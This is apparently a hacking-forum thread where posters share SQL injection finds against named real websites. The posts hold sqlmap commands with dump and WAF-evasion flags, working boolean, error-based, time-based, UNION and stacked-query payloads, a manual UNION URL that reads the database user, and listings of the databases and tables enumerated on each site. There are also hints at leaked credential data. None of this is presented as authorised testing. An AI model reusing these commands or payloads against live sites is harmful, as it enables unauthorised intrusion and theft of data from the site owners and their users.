
Interesting SQL injection & XSS finds

Code:
sqlmap --url="www.habibitours.com/cat.php?id=1"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1480=1480
 
Code:
sqlmap -url="https://www.ssc.edu.in/newsdetails.php?id=26" --dbs --random-agent --threads=10 --batch
GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Wishing all a successful academic year!")
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=26' AND 3740=3740 AND 'plmj'='plmj
 
Code:
sqlmap --url="https://samaritermuensingen.ch/index.php?id=2" --dbs  --tables  --dump-all

Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=2' OR NOT 2520=2520#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2' AND (SELECT 5171 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(5171=5171,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- syPz

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4008 FROM (SELECT(SLEEP(5)))Zydh)-- Oxdd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: id=2' UNION ALL SELECT NULL,NULL,CONCAT(0x7162787671,0x7a68784e58775777744669517a6149516c51794e694d5652647159786944794d47625a68786e6f6f,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL#
---
[02:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[02:46:43] [INFO] fetching database names
[02:46:43] [INFO] resumed: 'information_schema'
[02:46:43] [INFO] resumed: 'samariter_1'
available databases [2]:                                                                                                                                   
[*] information_schema
[*] samariter_1

[02:46:43] [INFO] fetching tables for databases: 'information_schema, samariter_1'
Database: information_schema                                                                                                                               
[62 tables]

Database: samariter_1
[19 tables]
 
Code:
sqlmap --url="www.cyta.com.ar/ta/article.php?id=180101"
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=180101 AND 2829=2829

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=180101 AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(5455=5455,1))),0x717a6b7a71),5455)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=180101 AND (SELECT 6261 FROM (SELECT(SLEEP(5)))FnQp)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 24 columns
    Payload: id=-8814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x69446143426867647a484c486e794d6349616d555777454c59416e6357474a68546a6352654b4c79,0x717a6b7a71),NULL,NULL#
 
Code:
sqlmap --url="www.habibitours.com/cat.php?id=1"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1480=1480
Code:
https://www.ssc.edu.in/newsdetails.php?id=26%27+and+0+/*!12345union*/+select+1,user(),3,4,5,6,7,8,9,10,11,12,13--+k
You could finish working on it first and post it afterwards.
 
Code:
https://www.ssc.edu.in/newsdetails.php?id=26%27+and+0+/*!12345union*/+select+1,user(),3,4,5,6,7,8,9,10,11,12,13--+k
You could finish working on it first and post it afterwards.
I just test it.
It shows vuln there, then I post it. I don't do shit things, kid.
 
sqlmap -u https://luminousworldhba.com/Products.aspx?brd=1

Database: luminousdb
[104 tables]
 
sqlmap -u https://www.euroland.com/SiteFiles/...res.asp?GUID=7304BAEC0BD99441BEDB53A754EB6E79 --data"=find=&findbutton=Szukaj"

Parameter: find (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: find=RuXB';WAITFOR DELAY '0:0:5'--&findbutton=Szukaj

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: find=RuXB' UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(66)+CHAR(86)+CHAR(109)+CHAR(72)+CHAR(90)+CHAR(112)+CHAR(101)+CHAR(67)+CHAR(106)+CHAR(116)+CHAR(68)+CHAR(76)+CHAR(80)+CHAR(99)+CHAR(81)+CHAR(114)+CHAR(107)+CHAR(112)+CHAR(86)+CHAR(112)+CHAR(105)+CHAR(110)+CHAR(111)+CHAR(80)+CHAR(121)+CHAR(65)+CHAR(81)+CHAR(119)+CHAR(101)+CHAR(87)+CHAR(118)+CHAR(66)+CHAR(103)+CHAR(114)+CHAR(80)+CHAR(76)+CHAR(73)+CHAR(67)+CHAR(68)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- NphV&findbutton=Szukaj
---
back-end DBMS: Microsoft SQL Server 2017
available databases [84]:
 
sqlmap.py "https://hunniez.com/rss/?category=&id=2" -p "category" --no-cast --tamper between,charencode,space2comment --technique B --level 5 --risk 3 --random-agent --batch


available databases [2]:
[*] hunniez_pfox
[*] information_schema


Database: hunniez_pfox
[426 tables]
 
iroc forum
 

gogetsms.com

SQLI Vuln:

Payload:


Sample
Dehashed Base:

 
Are you using a cracked version of Araneida?
No, that was before we parted off with my Araneida old partner/owner.
 

